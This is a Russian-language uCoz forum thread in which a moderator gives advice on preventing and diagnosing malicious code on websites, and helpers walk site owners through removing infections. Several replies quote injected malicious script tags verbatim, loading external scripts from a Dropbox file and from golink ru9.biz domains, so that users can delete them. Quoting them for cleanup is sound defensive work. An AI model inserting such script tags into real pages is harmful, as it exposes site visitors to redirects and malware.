Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    IIoJIb3oBaTeJIb
    Сообщений: 373
    Репутация: 21

    Сообщение # 571 | 10:43:44
    Цитата (bandjuk)
    1. перед body скрипт:
    Где находится это body?
    Цитата (bandjuk)
    в футере:
    Где находится футер?

    Всё для антивирусов: Ключи, Базы, Софт и другое - Antivirus-world.do.am
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 572 | 10:56:40
    с такими вопросами может не стоит заниматься сайтостроением?
    IIoJIb3oBaTeJIb
    Сообщений: 373
    Репутация: 21

    Сообщение # 573 | 10:59:49
    Цитата (bandjuk)
    с такими вопросами может не стоит заниматься сайтостроением?
    Не иронизируйте, ответьте на мои вопросы лучше!

    Всё для антивирусов: Ключи, Базы, Софт и другое - Antivirus-world.do.am
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 574 | 11:04:00
    никакой иронии. Воспользуйся для удаления скриптов быстрой заменой, предвидя вопрос о том, что это ---> //forum.ucoz.ru/forum/34-31884-1
    Maynard
    Сообщений: 2
    Репутация: 0

    Сообщение # 575 | 14:40:29
    Здравствуйте, помогите вычислить и удалить вирусы, пожалуйста. Сайту два года и до недавнего времени никаких проблем не было(:
    http://omnizod-comics.ucoz.ru/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 576 | 14:42:55
    Maynard, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вписываете скрипт

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/tnwyduomjbcsxzm/opapo.txt"></script>


    поле на что заменить оставляете пустым и производите замену во всех модулях

    после очистки обязательно меняем uID пароль профиля, которым администрируете сайт. инструкция тут //forum.ucoz.ru/forum/45-52299-1

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Maynard
    Сообщений: 2
    Репутация: 0

    Сообщение # 577 | 14:52:13
    webanet, большое спасибо)
    SeOn1981
    Сообщений: 29
    Репутация: 0

    Сообщение # 578 | 18:44:28
    Здравствуйте. Подскажите, что можно зделать с этим сайт http://risunok.ucoz.com

    Прикрепления: 2313847.jpg (108.2 Kb)

    http://risunok.ucoz.com/
    Дуб2123
    Сообщений: 3
    Репутация: 0

    Сообщение # 579 | 18:51:18
    Доброго времени суток, меня беспокоит такая проблема:

    Сайт http://yes-cs.ucoz.ru
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 580 | 20:34:41
    Дуб2123, SeOn1981, вы уже что-то удаляли с сайтов?

    рисунок заблочили за рекламу рич медиа. реклама могла быть как на самом сайте, так и на сайтах, ссылки которых присутствуют в коде

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Дуб2123
    Сообщений: 3
    Репутация: 0

    Сообщение # 581 | 23:30:21
    Цитата (webanet)
    Дуб2123, SeOn1981, вы уже что-то удаляли с сайтов?
    Да, почистил "корень" сайта. Сменил шаблон на стандартный.

    Добавлено (17 Сен 2013, 23:30:21)
    ---------------------------------------------
    Помогите, пожалуйста, как исправить подобную ошибку? smile

    Лодка
    Сообщений: 1
    Репутация: 0

    Сообщение # 582 | 01:12:36
    Здравствуйте! Заимел проблему, которую пока не могу решить сам ((. Суть - заметил что на сайт начали добавляться новости, не имеющие отношения ко мне и моему сайту. В логах нашел добавление с левого IP адреса. Поменял пароли, почистил инфо. Затем сайт выпал из поиска Яндекс, они написали что имеет место код, которые подменяет результаты при переходе из поиска. Облазил ручками коды всех участков сайта, нашел в 13 местах одно и тоже , такого плана: <script language="javascript" src="./js.php?s=54"></script><script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script><script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43">

    через поиск/замену - вычистил, сменил опять пароли все. Сегодня смотрю опять добавлена новость левая, с того же левого ИП адреса, хотя авторизации на сайт нет в логах, а добавление новости - есть. Помогите, где сидит эта зараза? ((((
    сайт http://lodki.ucoz.ua
    genarz
    Сообщений: 4
    Репутация: 0

    Сообщение # 583 | 12:03:24
    Здравствуйте!
    Сайт http://virt.do.am/ гугл пометил что есть вирус не как не могу найти его
    Помогите
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 584 | 12:35:03
    genarz, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вписываете скрипт

    Код
    <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>


    поле на что заменить оставляете пустым и производите замену во всех модулях

    после очистки обязательно меняем uID пароль профиля, которым администрируете сайт. инструкция тут //forum.ucoz.ru/forum/45-52299-1

    Дуб2123, ждем перепроверки гуглом. ваш сайт долго под блоком простоял

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 585 | 12:36:11
    Лодка, читаем инструкцию со слов как удалить //forum.ucoz.ru/forum/45-38778-809634-16-1328208136 пункт 4-ый

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Поиск: